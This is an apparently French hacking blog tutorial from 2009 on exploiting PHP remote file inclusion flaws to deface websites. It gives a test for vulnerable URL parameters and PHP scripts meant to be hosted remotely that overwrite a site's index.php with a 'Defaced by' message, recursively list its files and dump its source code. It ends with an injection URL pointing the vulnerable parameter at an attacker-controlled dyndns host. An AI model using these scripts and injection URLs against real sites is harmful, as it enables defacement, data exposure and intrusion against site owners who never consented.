Faille PHP include

Introduction

Le PHP au contraire de l’ HTML est dynamique, on peut changer le contenu de la page.
L’ URL http://www.site.com/index.php?page=Mikabou.php indique la redirection vers la page Mikabou.php
Pour exploiter une faille include il faut donc une URL de ce type http://www.lesite.fr/page.php?url=page.php
Pour voir si la faille est presente on va essayer de rediriger la page vers google tapez donc:
http://www.lesite.fr/page.php?url=http://www.google.fr  ou http://www.site.fr/page.php?var=http://www.google.fr
Là si Google apparaît dans le site , c’est que le site n’est apparemment pas protégé

Comment l’exploiter?

Pour pouvoir exploiter et defacer l’index il faut ajouter du code en utilisant la fonction
fwrite(). Il suffit de faire ce petit script php et de l’ héberger sur un compte comme Lycos

<?
$fp=fopen(”index.php”, w);
$msg=”Message qui apparait comme Defaced by Mikabou “;
fwrite($fp,$msg);
fclose($fp);
?>

lister le site

<?

function scann($rep){
$dir=opendir($rep);
while($file=readdir($dir)){
if(is_dir(”$rep/$file”)){
scann(”$rep/$file”);
}else{
echo “$rep/$file”;
}
}
}
scann(”.”);
?>

lire les fichier (ceci veut dire que vous aurez le code php non interpreter)

<?
$inF = fopen($file, “r”);
$j=”";
while (!feof($inF)) {
$j=$j.fgets($inF, 4096).”<br>”;
}
$j=’<font color=”#000000″>’.$j.’</font>’;
echo $j;
fclose($inF);
?>

Maintenant le code finie il suffit de rediriger la page, sur le script qui defacera l’ index. Exemple; http://www.lesite.fr/page.php?url=http://mikabou.dyndns.org/deface

Tags: Include

This entry was posted on Monday, January 12th, 2009 at 2:07 am and is filed under Tutoriaux. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.